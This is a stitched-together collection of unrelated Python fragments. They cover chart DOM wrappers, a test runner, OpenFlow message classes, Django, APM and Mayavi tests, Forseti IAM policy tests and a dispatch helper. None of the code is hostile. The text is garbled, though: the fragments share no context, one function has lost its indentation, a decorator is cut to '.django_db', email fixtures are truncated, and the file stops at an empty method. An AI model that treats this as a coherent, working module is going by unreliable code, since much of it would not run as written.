    Builds a container ``div``, appends it to *container* (or to
    ``document.body`` when no container id is given), instantiates a Chart on
    the new element's 2d context, and stores it under ``window[jsCode]``.

    :param html_code: The DOM id to give the new element (also used as the JS variable code).
    :param container: Optional id of an existing DOM element to attach to.
    :param options: Chart options forwarded to ``getCtx``.
    """
    self.component.options.managed = False
    self.component.js_code = html_code
    js_code = JsUtils.jsConvertData(self.component.js_code, None).toStr()
    # Strip a leading "window['...']" wrapper so only the bare key remains.
    if js_code.startswith('window'):
        js_code = js_code[7:(- 1)]
    return JsUtils.jsWrap(('(function(containerId, tag, htmlCode, jsCode, ctx, attrs){\n const contDiv = document.createElement("div");\n const newDiv = document.createElement(tag);Object.keys(attrs).forEach( \n function(key) {contDiv.setAttribute(key, attrs[key]);}); newDiv.id = htmlCode;\n contDiv.appendChild(newDiv);\n if(!containerId){ document.body.appendChild(contDiv)} else {document.getElementById(containerId).appendChild(contDiv)};\n window[jsCode] = new Chart(newDiv.getContext("2d"), ctx); return newDiv;\n})(%(container)s, "%(tag)s", %(html_code)s, %(js_code)s, %(ctx)s, %(attrs)s)' % {'js_code': js_code, 'attrs': self.component.get_attrs(css_class_names=self.component.style.get_classes(), to_str=False), 'html_code': JsUtils.jsConvertData((html_code or self.component.html_code), None), 'tag': self.component.tag, 'ctx': self.component.getCtx(options), 'container': JsUtils.jsConvertData(container, None)}))
def execute(function, filenames, verbose):
    """Run one test *function* against *filenames* and classify the outcome.

    Prints progress (a banner and traceback when *verbose*, a single
    character otherwise) and returns ``(name, filenames, kind, info)`` where
    *kind* is 'SUCCESS', 'FAILURE' (AssertionError) or 'ERROR', and *info*
    is the ``sys.exc_info()`` triple on failure, else None.
    """
    # Resolve the display name across Python 2/3 and wrapped unittest functions.
    if PY3:
        name = function.__name__
    elif hasattr(function, 'unittest_name'):
        name = function.unittest_name
    else:
        name = function.func_name
    if verbose:
        sys.stdout.write('=' * 75 + '\n')
        sys.stdout.write('%s(%s)...\n' % (name, ', '.join(filenames)))
    kind, info = 'SUCCESS', None
    try:
        function(*filenames, verbose=verbose)
    except Exception as exc:
        info = sys.exc_info()
        kind = 'FAILURE' if isinstance(exc, AssertionError) else 'ERROR'
        if verbose:
            traceback.print_exc(limit=1, file=sys.stdout)
        else:
            sys.stdout.write(kind[0])
            sys.stdout.flush()
    else:
        if not verbose:
            sys.stdout.write('.')
            sys.stdout.flush()
    return (name, filenames, kind, info)
class role_request(message):
    """Controller role-request message (wire protocol version 3, message type 24).

    Generated-style serializer: fixed header fields, a 32-bit role, 4 bytes
    of padding and a 64-bit generation id.

    NOTE(review): pack() appends a 4-byte str of NULs alongside struct.pack()
    output, which only joins cleanly on Python 2 (struct.pack returns bytes
    on Python 3) — confirm the target runtime.
    """
    # Header constants for this message type.
    version = 3
    type = 24
    def __init__(self, xid=None, role=None, generation_id=None):
        # role and generation_id default to 0; xid stays None until assigned.
        if (xid != None):
            self.xid = xid
        else:
            self.xid = None
        if (role != None):
            self.role = role
        else:
            self.role = 0
        if (generation_id != None):
            self.generation_id = generation_id
        else:
            self.generation_id = 0
        return
    def pack(self):
        """Serialize to wire format; the 16-bit length at offset 2 is patched
        in once the total size is known."""
        packed = []
        packed.append(struct.pack('!B', self.version))
        packed.append(struct.pack('!B', self.type))
        packed.append(struct.pack('!H', 0))  # length placeholder, patched below
        packed.append(struct.pack('!L', self.xid))
        packed.append(struct.pack('!L', self.role))
        packed.append(('\x00' * 4))  # pad
        packed.append(struct.pack('!Q', self.generation_id))
        length = sum([len(x) for x in packed])
        packed[2] = struct.pack('!H', length)
        return ''.join(packed)
    def unpack(reader):
        """Parse a role_request from *reader*, validating version and type.

        NOTE(review): no ``self`` parameter — presumably a staticmethod whose
        decorator was lost; confirm against the generator's conventions.
        """
        obj = role_request()
        _version = reader.read('!B')[0]
        assert (_version == 3)
        _type = reader.read('!B')[0]
        assert (_type == 24)
        _length = reader.read('!H')[0]
        # Restrict further reads to this message's declared length.
        orig_reader = reader
        reader = orig_reader.slice(_length, 4)
        obj.xid = reader.read('!L')[0]
        obj.role = reader.read('!L')[0]
        reader.skip(4)  # pad
        obj.generation_id = reader.read('!Q')[0]
        return obj
    def __eq__(self, other):
        # Field-by-field equality; header constants are class-level and equal by type check.
        if (type(self) != type(other)):
            return False
        if (self.xid != other.xid):
            return False
        if (self.role != other.role):
            return False
        if (self.generation_id != other.generation_id):
            return False
        return True
    def pretty_print(self, q):
        """Write a human-readable rendering of this message to printer *q*."""
        q.text('role_request {')
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text('xid = ')
                if (self.xid != None):
                    q.text(('%#x' % self.xid))
                else:
                    q.text('None')
                q.text(',')
                q.breakable()
                q.text('role = ')
                # Show the symbolic role name when the value is a known constant.
                value_name_map = {0: 'OFPCR_ROLE_NOCHANGE', 1: 'OFPCR_ROLE_EQUAL', 2: 'OFPCR_ROLE_MASTER', 3: 'OFPCR_ROLE_SLAVE'}
                if (self.role in value_name_map):
                    q.text(('%s(%d)' % (value_name_map[self.role], self.role)))
                else:
                    q.text(('%#x' % self.role))
                q.text(',')
                q.breakable()
                q.text('generation_id = ')
                q.text(('%#x' % self.generation_id))
            q.breakable()
        q.text('}')
# NOTE(review): the line below looks like a truncated `@pytest.mark.django_db`
# decorator (extraction artifact) — as written it is not valid syntax; confirm
# against the original file.
.django_db
def test_agency_count_invalid_defc(client, monkeypatch, disaster_account_data, helpers, elasticsearch_award_index):
    """An unknown DEF code ('ZZ') posted to the count endpoint must yield HTTP 400."""
    setup_elasticsearch_test(monkeypatch, elasticsearch_award_index)
    helpers.patch_datetime_now(monkeypatch, 2022, 12, 31)
    resp = helpers.post_for_count_endpoint(client, url, ['ZZ'])
    assert (resp.status_code == status.HTTP_400_BAD_REQUEST)
    assert (resp.data['detail'] == "Field 'filter|def_codes' is outside valid values ['9', 'L', 'M', 'N', 'O', 'P', 'Q']")
def test_chained_cause_exception(elasticapm_client):
    """A captured exception must carry its __cause__ chain in the error event."""
    try:
        try:
            1 / 0
        except ZeroDivisionError as original:
            # Explicit chaining: ValueError.__cause__ is the ZeroDivisionError.
            raise ValueError('bla') from original
    except ValueError:
        elasticapm_client.capture_exception()
    captured = elasticapm_client.events[ERROR][0]
    exc_payload = captured['exception']
    assert exc_payload['type'] == 'ValueError'
    assert exc_payload['cause'][0]['type'] == 'ZeroDivisionError'
class OptionPlotoptionsColumnSonificationDefaultinstrumentoptions(Options):
    """Config wrapper for column-series sonification default instrument options.

    NOTE(review): each option appears as a getter/setter pair of same-named
    defs with no decorators; as written the second def shadows the first, so
    these look like `@property` / `@x.setter` pairs whose decorators were
    stripped (extraction artifact) — confirm against the generated original.
    """
    def activeWhen(self) -> 'OptionPlotoptionsColumnSonificationDefaultinstrumentoptionsActivewhen':
        # Nested sub-options object.
        return self._config_sub_data('activeWhen', OptionPlotoptionsColumnSonificationDefaultinstrumentoptionsActivewhen)
    def instrument(self):
        # Default: 'piano'.
        return self._config_get('piano')
    def instrument(self, text: str):
        self._config(text, js_type=False)
    def mapping(self) -> 'OptionPlotoptionsColumnSonificationDefaultinstrumentoptionsMapping':
        return self._config_sub_data('mapping', OptionPlotoptionsColumnSonificationDefaultinstrumentoptionsMapping)
    def midiName(self):
        # No default.
        return self._config_get(None)
    def midiName(self, text: str):
        self._config(text, js_type=False)
    def pointGrouping(self) -> 'OptionPlotoptionsColumnSonificationDefaultinstrumentoptionsPointgrouping':
        return self._config_sub_data('pointGrouping', OptionPlotoptionsColumnSonificationDefaultinstrumentoptionsPointgrouping)
    def roundToMusicalNotes(self):
        # Default: True.
        return self._config_get(True)
    def roundToMusicalNotes(self, flag: bool):
        self._config(flag, js_type=False)
    def showPlayMarker(self):
        # Default: True.
        return self._config_get(True)
    def showPlayMarker(self, flag: bool):
        self._config(flag, js_type=False)
    def type(self):
        # Default: 'instrument'.
        return self._config_get('instrument')
    def type(self, text: str):
        self._config(text, js_type=False)
def transfer(frm, to, value, height, hash):
    """Move *value* to account *to*, debiting *frm* when it is not None.

    Validates that the (height, hash) pair matches the known dependency chain
    and that every involved account is active at *height*. Returns True on
    success, False if any validation fails.

    Note: the ``hash`` parameter shadows the builtin; kept for interface
    compatibility with callers.
    """
    # The block at *height* must exist and carry the expected hash.
    if len(deps) <= height or deps[height] != hash:
        return False
    # Recipient must be active no later than *height*.
    if not (is_account_state_active(state[to]) and height >= state[to].yes_dep.height):
        return False
    # Sender (when present) must also be active no later than *height*.
    if frm is not None:
        if not (is_account_state_active(state[frm]) and height >= state[frm].yes_dep.height):
            return False
    balance_delta(to, value, height, hash)
    if frm is not None:
        balance_delta(frm, -value, height, hash)
    return True
def _retrieveInfo(info, data):
if ('treatment' in info):
if ('meta' not in data):
data['meta'] = {}
data['meta']['treatment_diff'] = info['treatment'].get('diff', '')
data['meta']['treatment_version'] = info['treatment'].get('version', '')
data['meta']['treatment_commit'] = info['treatment'].get('commit', '')
if (('control' in info) and ('diff' in info['control'])):
if ('meta' not in data):
data['meta'] = {}
data['meta']['control_diff'] = info['control'].get('diff', '')
data['meta']['control_commit'] = info['control'].get('commit', '')
return data |
def update_item_config(item_type: str, package_path: Path, **kwargs: Any) -> None:
    """Update fields of a package's item configuration and write it back to disk.

    :param item_type: The package/item type, used to pick the config loader.
    :param package_path: Path to the package directory.
    :param kwargs: Attribute name/value pairs to set on the loaded config.
    """
    item_config = load_item_config(item_type, package_path)
    for field_name, field_value in kwargs.items():
        setattr(item_config, field_name, field_value)
    target_path = os.path.join(package_path, item_config.default_configuration_filename)
    config_loader = ConfigLoaders.from_package_type(item_type)
    with open_file(target_path, 'w') as stream:
        config_loader.dump(item_config, stream)
class bsn_flow_idle_enable_get_request(bsn_header):
    """Vendor (experimenter 6035143) request, subtype 38, wire version 6.

    Generated-style serializer: header plus experimenter/subtype fields only;
    the message carries no payload beyond its identifiers.
    """
    # Header/experimenter constants for this message type.
    version = 6
    type = 4
    experimenter = 6035143
    subtype = 38
    def __init__(self, xid=None):
        # xid stays None until assigned by the caller/transport.
        if (xid != None):
            self.xid = xid
        else:
            self.xid = None
        return
    def pack(self):
        """Serialize to wire format; the 16-bit length at offset 2 is patched
        in once the total size is known."""
        packed = []
        packed.append(struct.pack('!B', self.version))
        packed.append(struct.pack('!B', self.type))
        packed.append(struct.pack('!H', 0))  # length placeholder, patched below
        packed.append(struct.pack('!L', self.xid))
        packed.append(struct.pack('!L', self.experimenter))
        packed.append(struct.pack('!L', self.subtype))
        length = sum([len(x) for x in packed])
        packed[2] = struct.pack('!H', length)
        return ''.join(packed)
    def unpack(reader):
        """Parse an instance from *reader*, validating all header constants.

        NOTE(review): no ``self`` parameter — presumably a staticmethod whose
        decorator was lost; confirm against the generator's conventions.
        """
        obj = bsn_flow_idle_enable_get_request()
        _version = reader.read('!B')[0]
        assert (_version == 6)
        _type = reader.read('!B')[0]
        assert (_type == 4)
        _length = reader.read('!H')[0]
        # Restrict further reads to this message's declared length.
        orig_reader = reader
        reader = orig_reader.slice(_length, 4)
        obj.xid = reader.read('!L')[0]
        _experimenter = reader.read('!L')[0]
        assert (_experimenter == 6035143)
        _subtype = reader.read('!L')[0]
        assert (_subtype == 38)
        return obj
    def __eq__(self, other):
        # Only xid is instance state; constants are checked via the type test.
        if (type(self) != type(other)):
            return False
        if (self.xid != other.xid):
            return False
        return True
    def pretty_print(self, q):
        """Write a human-readable rendering of this message to printer *q*."""
        q.text('bsn_flow_idle_enable_get_request {')
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text('xid = ')
                if (self.xid != None):
                    q.text(('%#x' % self.xid))
                else:
                    q.text('None')
            q.breakable()
        q.text('}')
def extract_from_pdf(response):
    """Extract all text from a PDF HTTP response and split it into paragraphs.

    Reads every page with PyPDF2, flattens line breaks to spaces, and hands
    the single combined string to ``split_paragraphs`` with a 500 limit.

    :param response: An HTTP response object whose ``content`` is raw PDF bytes.
    """
    reader = PyPDF2.PdfFileReader(io.BytesIO(response.content))
    page_texts = [reader.getPage(n).extractText() for n in range(reader.getNumPages())]
    # Normalise all newline flavours to single spaces.
    flattened = re.sub('\\r\\n|\\r|\\n', ' ', ''.join(page_texts))
    return split_paragraphs([flattened], 500)
class ClusterResourceAttributes(_common.FlyteIdlEntity):
    """Wrapper around the matchable-resource ClusterResourceAttributes protobuf.

    :param attributes: Mapping of custom attributes forwarded to the protobuf.
    """

    def __init__(self, attributes):
        self._attributes = attributes

    @property
    def attributes(self):
        """The custom attributes mapping held by this object."""
        # Restored @property: to_flyte_idl reads ``self.attributes`` as an
        # attribute — without the decorator it would pass the bound method.
        return self._attributes

    def to_flyte_idl(self):
        """Return the protobuf representation of this object."""
        return _matchable_resource.ClusterResourceAttributes(attributes=self.attributes)

    @classmethod
    def from_flyte_idl(cls, pb2_object):
        """Build an instance from its protobuf representation."""
        # Restored @classmethod: the first parameter is named ``cls``.
        return cls(attributes=pb2_object.attributes)
def populate_quantsarray(fname, feats_dir):
    """Load a quantized waveform from *fname* and split it into coarse/fine bytes.

    The stored values are shifted by 2**15 into [0, 65535], then split into a
    coarse (high) byte and fine (low) byte, each also scaled to [-1.0, 1.0].

    :param fname: Path to a .npy file of quantized samples.
    :param feats_dir: Unused; kept for interface compatibility with callers.
    :return: Dict with keys fname, coarse, coarse_float, fine, fine_float.
    """
    arr = {'fname': fname}
    quant = np.load(fname)
    # Shift from signed 16-bit range into unsigned [0, 65535].
    quant = quant.astype(np.int64) + (2 ** 15)
    assert len(quant) > 1
    coarse = quant // 256
    # np.float was removed in NumPy 1.20; np.float64 is the same dtype it aliased.
    coarse_float = (coarse.astype(np.float64) / 127.5) - 1.0
    fine = quant % 256
    fine_float = (fine.astype(np.float64) / 127.5) - 1.0
    arr['coarse'] = coarse
    arr['coarse_float'] = coarse_float
    arr['fine'] = fine
    arr['fine_float'] = fine_float
    return arr
class TestTwoColumns(I3LayoutScenario):
    """Scenario test for the '2columns' i3 layout: windows alternate between
    two vertical columns, column 1 left of column 2."""
    def test_scenario(self):
        """Run the scenario for every parameter set, then close all windows."""
        for params in self.layout_params():
            # NOTE(review): 'senario' looks like a typo for 'scenario' —
            # presumably defined on I3LayoutScenario; confirm before renaming.
            self.senario(params)
        self._close_all()
    def layout(self, params: List) -> str:
        """Build the layout command string from the position parameter."""
        position = params[0]
        return f'2columns {position}'
    def layout_params(self) -> List:
        # Only the 'left' position is exercised here.
        return [['left']]
    def alternate_layout(self) -> str:
        """Layout to switch to when the scenario toggles layouts."""
        return 'hstack'
    def validate(self, args):
        """Check window geometry: equal heights per column, vertical stacking,
        aligned x per column, and column 1 strictly left of column 2."""
        windows = self.workspaces.windows()
        geoms = [self._get_window_geometry(window) for window in windows]
        # Windows alternate: even indices form column 1, odd indices column 2.
        (column_1, column_2) = (geoms[::2], geoms[1::2])
        for (i, geom) in enumerate(column_1[1:]):
            assert (geom.height == approx(column_1[i].height, abs=1))
            assert (geom.y > (column_1[i].y + column_1[i].height))
            assert (geom.x == column_1[i].x)
            if (len(column_2) > 0):
                assert (geom.x < column_2[0].x)
        for (i, geom) in enumerate(column_2[1:]):
            assert (geom.height == approx(column_2[i].height, abs=1))
            assert (geom.y > (column_2[i].y + column_2[i].height))
            assert (geom.x == column_2[i].x)
class IamPolicyTest(ForsetiTestCase):
    """Tests for IAM policy parsing: members, bindings, policies and audit
    configs, including wildcard matching and merge semantics.

    NOTE(review): several fixture strings (e.g. 'user:test-',
    'serviceAccount:.com') look like emails truncated by extraction —
    confirm against the original fixtures before editing them.
    """
    def setUp(self):
        # Raw member strings used to build IamPolicyMember fixtures; several
        # contain '*' wildcards exercised by the matching tests.
        self.members = ['user:test-', 'group:test-', 'serviceAccount:test-.com', 'allUsers', 'allAuthenticatedUsers', 'user:*', 'serviceAccount:**.gserviceaccount.com', 'user:*']
        self.test_members = ['user:test-', 'serviceAccount:.com', 'user:', 'allUsers', 'allAuthenticatedUsers', 'user:anything']
    def test_member_create_from_is_correct(self):
        """create_from parses type, name and name regex for each member kind."""
        iam_member1 = IamPolicyMember.create_from(self.members[0])
        self.assertEqual('user', iam_member1.type)
        self.assertEqual('test-', iam_member1.name)
        self.assertEqual('^test\\-user\\\\.com$', iam_member1.name_pattern.pattern)
        iam_member2 = IamPolicyMember.create_from(self.members[3])
        self.assertEqual('allUsers', iam_member2.type)
        self.assertIsNone(iam_member2.name)
        self.assertIsNone(iam_member2.name_pattern)
        iam_member3 = IamPolicyMember.create_from(self.members[4])
        self.assertEqual('allAuthenticatedUsers', iam_member3.type)
        self.assertIsNone(iam_member3.name)
        self.assertIsNone(iam_member3.name_pattern)
    def test_member_match_works(self):
        """matches() honours exact names, allUsers/allAuthenticatedUsers and wildcards."""
        iam_policy_members = [IamPolicyMember.create_from(self.members[0]), IamPolicyMember.create_from(self.members[3]), IamPolicyMember.create_from(self.members[5]), IamPolicyMember.create_from(self.members[6]), IamPolicyMember.create_from(self.members[7]), IamPolicyMember.create_from(self.members[4])]
        self.assertTrue(iam_policy_members[0].matches(self.test_members[0]))
        self.assertTrue(iam_policy_members[1].matches(self.members[3]))
        self.assertTrue(iam_policy_members[1].matches(self.test_members[3]))
        self.assertTrue(iam_policy_members[2].matches(self.test_members[0]))
        self.assertTrue(iam_policy_members[3].matches(self.test_members[1]))
        self.assertTrue(iam_policy_members[4].matches(self.test_members[2]))
        self.assertTrue(iam_policy_members[4].matches(self.test_members[5]))
        self.assertTrue(iam_policy_members[5].matches(self.test_members[4]))
        # Negative cases: wrong name, wrong domain, wrong type.
        self.assertFalse(iam_policy_members[0].matches('user:not-'))
        self.assertFalse(iam_policy_members[2].matches('user:.com'))
        self.assertFalse(iam_policy_members[2].matches('user:'))
        self.assertFalse(iam_policy_members[2].matches('user:.notmycompany.com'))
        self.assertFalse(iam_policy_members[3].matches('serviceAccount:'))
    def test_member_invalid_type_raises(self):
        """An unknown member type must raise InvalidIamPolicyMemberError."""
        with self.assertRaises(InvalidIamPolicyMemberError):
            iam_member = IamPolicyMember('fake_type')
    def test_binding_create_from_is_correct(self):
        """Binding parsing keeps role/members and builds the role regex ('*' -> '.*')."""
        binding = {'role': 'roles/viewer', 'members': self.test_members}
        iam_binding = IamPolicyBinding.create_from(binding)
        self.assertEqual(binding['role'], iam_binding.role_name)
        self.assertEqual(binding['members'], _get_member_list(iam_binding.members))
        self.assertEqual('^roles\\/viewer$', iam_binding.role_pattern.pattern)
        binding2 = {'role': 'roles/*', 'members': self.test_members}
        iam_binding2 = IamPolicyBinding.create_from(binding2)
        self.assertEqual('^roles\\/.*$', iam_binding2.role_pattern.pattern)
    def test_binding_missing_role_raises(self):
        with self.assertRaises(InvalidIamPolicyBindingError):
            IamPolicyBinding(None, ['*'])
    def test_binding_missing_members_raises(self):
        with self.assertRaises(InvalidIamPolicyBindingError):
            IamPolicyBinding('roles/fake', [])
    def test_binding_merge_members_other_type_different_raises(self):
        """merge_members rejects anything that is not an IamPolicyBinding."""
        with self.assertRaises(InvalidIamPolicyBindingError):
            binding = {'role': 'roles/viewer', 'members': ['user:test-', 'serviceAccount:.com']}
            iam_binding = IamPolicyBinding.create_from(binding)
            iam_binding.merge_members([1, 2, 4])
    def test_binding_merge_members_same_role_and_members(self):
        """Merging identical bindings is a no-op."""
        binding = {'role': 'roles/viewer', 'members': ['user:test-', 'serviceAccount:.com']}
        iam_binding1 = IamPolicyBinding.create_from(binding)
        iam_binding2 = IamPolicyBinding.create_from(binding)
        iam_binding1.merge_members(iam_binding2)
        self.assertEqual(iam_binding1, iam_binding2)
    def test_binding_merge_members_same_role_different_members(self):
        """Same role, disjoint members: the union of members is kept."""
        binding1 = {'role': 'roles/viewer', 'members': ['user:test-', 'serviceAccount:.com']}
        binding2 = {'role': 'roles/viewer', 'members': ['user:']}
        expected_binding = {'role': 'roles/viewer', 'members': ['user:test-', 'serviceAccount:.com', 'user:']}
        iam_binding1 = IamPolicyBinding.create_from(binding1)
        iam_binding2 = IamPolicyBinding.create_from(binding2)
        iam_binding1.merge_members(iam_binding2)
        expected_binding = IamPolicyBinding.create_from(expected_binding)
        self.assertEqual(expected_binding, iam_binding1)
    def test_binding_merge_members_same_role_mixed_members(self):
        """Same role, overlapping members: duplicates are not repeated."""
        binding1 = {'role': 'roles/viewer', 'members': ['user:test-', 'serviceAccount:.com']}
        binding2 = {'role': 'roles/viewer', 'members': ['user:', 'serviceAccount:.com']}
        expected_binding = {'role': 'roles/viewer', 'members': ['user:test-', 'serviceAccount:.com', 'user:']}
        iam_binding1 = IamPolicyBinding.create_from(binding1)
        iam_binding2 = IamPolicyBinding.create_from(binding2)
        iam_binding1.merge_members(iam_binding2)
        expected_binding = IamPolicyBinding.create_from(expected_binding)
        self.assertEqual(expected_binding, iam_binding1)
    def test_binding_merge_members_different_role(self):
        """Different roles: merge leaves the original binding unchanged."""
        binding1 = {'role': 'roles/owner', 'members': ['user:test-', 'serviceAccount:.com']}
        binding2 = {'role': 'roles/viewer', 'members': ['user:']}
        expected_binding = {'role': 'roles/owner', 'members': ['user:test-', 'serviceAccount:.com']}
        iam_binding1 = IamPolicyBinding.create_from(binding1)
        iam_binding2 = IamPolicyBinding.create_from(binding2)
        iam_binding1.merge_members(iam_binding2)
        expected_binding = IamPolicyBinding.create_from(expected_binding)
        self.assertEqual(expected_binding, iam_binding1)
    def test_policy_create_from_is_correct(self):
        """Policy parsing builds bindings in order; audit_configs stays None when absent."""
        policy_json = {'bindings': [{'role': 'roles/editor', 'members': ['user:']}, {'role': 'roles/viewer', 'members': ['user:', 'group:']}]}
        iam_policy = IamPolicy.create_from(policy_json)
        actual_roles = [b.role_name for b in iam_policy.bindings]
        actual_members = [_get_member_list(b.members) for b in iam_policy.bindings]
        actual_audit_configs = iam_policy.audit_configs
        expected_roles = ['roles/editor', 'roles/viewer']
        expected_members = [['user:'], ['user:', 'group:']]
        self.assertEqual(expected_roles, actual_roles)
        self.assertEqual(expected_members, actual_members)
        self.assertIsNone(actual_audit_configs)
    def test_policy_create_from_with_audit_configs(self):
        """auditConfigs are parsed into {service: {log_type: exempted member set}}."""
        policy_json = {'bindings': [{'role': 'roles/editor', 'members': ['user:']}], 'auditConfigs': [{'service': 'allServices', 'auditLogConfigs': [{'logType': 'ADMIN_READ'}]}, {'service': 'storage.googleapis.com', 'auditLogConfigs': [{'logType': 'DATA_READ'}, {'logType': 'DATA_WRITE', 'exemptedMembers': ['user:', 'user:']}]}]}
        iam_policy = IamPolicy.create_from(policy_json)
        actual_roles = [b.role_name for b in iam_policy.bindings]
        actual_members = [_get_member_list(b.members) for b in iam_policy.bindings]
        actual_audit_configs = iam_policy.audit_configs.service_configs
        expected_roles = ['roles/editor']
        expected_members = [['user:']]
        expected_audit_configs = {'allServices': {'ADMIN_READ': set()}, 'storage.googleapis.com': {'DATA_READ': set(), 'DATA_WRITE': set(['user:', 'user:'])}}
        self.assertEqual(expected_roles, actual_roles)
        self.assertEqual(expected_members, actual_members)
        self.assertEqual(expected_audit_configs, actual_audit_configs)
    def test_empty_policy_has_zero_length_bindings(self):
        empty_policy = IamPolicy()
        self.assertTrue(empty_policy.is_empty())
        self.assertEqual(False, bool(empty_policy.bindings))
    def test_member_create_from_domain_is_correct(self):
        """'domain:' members keep the domain as name with an anchored regex."""
        member = IamPolicyMember.create_from('domain:xyz.edu')
        self.assertEqual('domain', member.type)
        self.assertEqual('xyz.edu', member.name)
        self.assertEqual('^xyz\\.edu$', member.name_pattern.pattern)
    def test_is_matching_domain_success(self):
        member = IamPolicyMember.create_from('domain:xyz.edu')
        other = IamPolicyMember.create_from('user:')
        self.assertTrue(member._is_matching_domain(other))
    def test_is_matching_domain_fail_wrong_domain(self):
        member = IamPolicyMember.create_from('domain:xyz.edu')
        other = IamPolicyMember.create_from('user:')
        self.assertFalse(member._is_matching_domain(other))
    def test_is_matching_domain_fail_wrong_type(self):
        # Only 'domain' members can domain-match; 'group' must not.
        member = IamPolicyMember.create_from('group:xyz.edu')
        other = IamPolicyMember.create_from('user:')
        self.assertFalse(member._is_matching_domain(other))
    def test_is_matching_domain_fail_invalid_email(self):
        member = IamPolicyMember.create_from('domain:xyz.edu')
        other = IamPolicyMember.create_from('user:u AT xyz DOT edu')
        self.assertFalse(member._is_matching_domain(other))
    def test_audit_config_create_from_is_correct(self):
        audit_configs_json = [{'service': 'allServices', 'auditLogConfigs': [{'logType': 'DATA_READ'}]}, {'service': 'storage.googleapis.com', 'auditLogConfigs': [{'logType': 'DATA_READ'}, {'logType': 'DATA_WRITE', 'exemptedMembers': ['user:', 'user:']}]}]
        audit_config = IamAuditConfig.create_from(audit_configs_json)
        expected_service_configs = {'allServices': {'DATA_READ': set()}, 'storage.googleapis.com': {'DATA_READ': set(), 'DATA_WRITE': set(['user:', 'user:'])}}
        expected_audit_config = IamAuditConfig(expected_service_configs)
        self.assertEqual(expected_service_configs, audit_config.service_configs)
        self.assertEqual(expected_audit_config, audit_config)
    def test_audit_config_create_from_bad_config(self):
        """A config entry without a 'service' key must raise."""
        audit_configs_json = [{'auditLogConfigs': [{'logType': 'DATA_READ'}]}]
        with self.assertRaises(InvalidIamAuditConfigError):
            audit_config = IamAuditConfig.create_from(audit_configs_json)
    def test_audit_config_merge_succeeds(self):
        """merge_configs unions services, log types and exemption sets."""
        configs1 = {'allServices': {'ADMIN_READ': set(['user:', 'user:']), 'DATA_READ': set()}, 'storage.googleapis.com': {'DATA_READ': set(), 'DATA_WRITE': set(['user:', 'user:'])}}
        configs2 = {'allServices': {'ADMIN_READ': set(['user:', 'user:']), 'DATA_WRITE': set()}, 'cloudsql.googleapis.com': {'DATA_READ': set(), 'DATA_WRITE': set(['user:', 'user:'])}}
        expected_configs = {'allServices': {'ADMIN_READ': set(['user:', 'user:', 'user:']), 'DATA_READ': set(), 'DATA_WRITE': set()}, 'cloudsql.googleapis.com': {'DATA_READ': set(), 'DATA_WRITE': set(['user:', 'user:'])}, 'storage.googleapis.com': {'DATA_READ': set(), 'DATA_WRITE': set(['user:', 'user:'])}}
        audit_config1 = IamAuditConfig(configs1)
        audit_config2 = IamAuditConfig(configs2)
        expected_audit_config = IamAuditConfig(expected_configs)
        audit_config1.merge_configs(audit_config2)
        # Mutating the source after merge must not affect the merged result
        # (i.e. merge_configs deep-copies the sets).
        audit_config2.service_configs['cloudsql.googleapis.com']['DATA_READ'].add('user:extra_')
        self.assertEqual(expected_audit_config, audit_config1)
def prepare_middleware_ws(middleware: Iterable) -> Tuple[(list, list)]:
    """Collect WebSocket middleware hooks into request/resource stages.

    For each component, looks up the optional ``process_request_ws`` and
    ``process_resource_ws`` bound methods. Any hook implemented as a plain
    (non-coroutine) Python function is rejected.

    :param middleware: Iterable of middleware components.
    :return: Tuple ``(request_mw, resource_mw)`` of hook lists.
    :raises CompatibilityError: If a hook is a non-awaitable Python function.
    """
    request_mw = []
    resource_mw = []
    for component in middleware:
        request_hook = util.get_bound_method(component, 'process_request_ws')
        resource_hook = util.get_bound_method(component, 'process_resource_ws')
        for hook in (request_hook, resource_hook):
            if not hook:
                continue
            # Native C-implemented callables are exempt; pure-Python hooks
            # must be coroutine functions.
            if not iscoroutinefunction(hook) and util.is_python_func(hook):
                raise CompatibilityError('{} must be implemented as an awaitable coroutine.'.format(hook))
        if request_hook:
            request_mw.append(request_hook)
        if resource_hook:
            resource_mw.append(resource_hook)
    return (request_mw, resource_mw)
class _MultiMethod():
    """A callable dispatching on the runtime classes of all positional arguments.

    Registered signatures (tuples of types) map to implementations; calling
    with an unregistered signature raises TypeError.
    """

    def __init__(self, name):
        # The name only appears in the TypeError message.
        self.name = name
        self.typemap = {}

    def __call__(self, *args):
        """Dispatch to the implementation registered for the args' classes."""
        signature = tuple(arg.__class__ for arg in args)
        implementation = self.typemap.get(signature)
        if implementation is None:
            raise TypeError(('no match %s for types %s' % (self.name, signature)))
        return implementation(*args)

    def register_function_for_types(self, types, function):
        """Register *function* for every combination of the given types,
        expanded to include all their subclasses."""
        expanded = [[ty] + all_subclasses(ty) for ty in types]
        for signature in itertools.product(*expanded):
            self.typemap[signature] = function
class TestGlyph(TestCase):
    """Integration test for Mayavi Glyph and VectorCutPlane modules, covering
    trait re-assignment, save/load persistence and deep-copy round trips."""
    def make_data(self):
        """Build a 10x10x10 scalar field and a matching unit-y vector field."""
        s = numpy.arange(0.0, 10.0, 0.01)
        s = numpy.reshape(s, (10, 10, 10))
        s = numpy.transpose(s)
        v = numpy.zeros(3000, 'd')
        v[1::3] = 1.0
        v = numpy.reshape(v, (10, 10, 10, 3))
        return (s, v)
    def set_view(self, s):
        """Move the camera of scene *s* to a fixed, reproducible viewpoint."""
        s.scene.z_plus_view()
        c = s.scene.camera
        c.azimuth((- 30))
        c.elevation(20)
        s.render()
    def check(self):
        """Assert the pipeline built in do() still has its configured traits."""
        script = self.script
        s = script.engine.current_scene
        src = s.children[0]
        # children[1] is the Glyph module added after the Outline.
        g = src.children[0].children[1]
        assert (g.glyph.glyph_source.glyph_position == 'center')
        assert (g.glyph.glyph.vector_mode == 'use_normal')
        assert (g.glyph.glyph.scale_factor == 0.5)
        assert (g.actor.property.line_width == 1.0)
        # children[2] is the first VectorCutPlane ('tail' position).
        v = src.children[0].children[2]
        glyph = v.glyph
        gs = glyph.glyph_source
        assert (gs.glyph_position == 'tail')
        assert (gs.glyph_source == gs.glyph_list[1])
        assert numpy.allclose(v.implicit_plane.normal, (0.0, 1.0, 0.0))
        # children[3] is the second VectorCutPlane ('head' position).
        v = src.children[0].children[3]
        glyph = v.glyph
        gs = glyph.glyph_source
        assert (gs.glyph_source == gs.glyph_list[2])
        assert (gs.glyph_position == 'head')
        assert numpy.allclose(v.implicit_plane.normal, (0.0, 1.0, 0.0))
    def test(self):
        """Entry point required by the test harness."""
        self.main()
    def do(self):
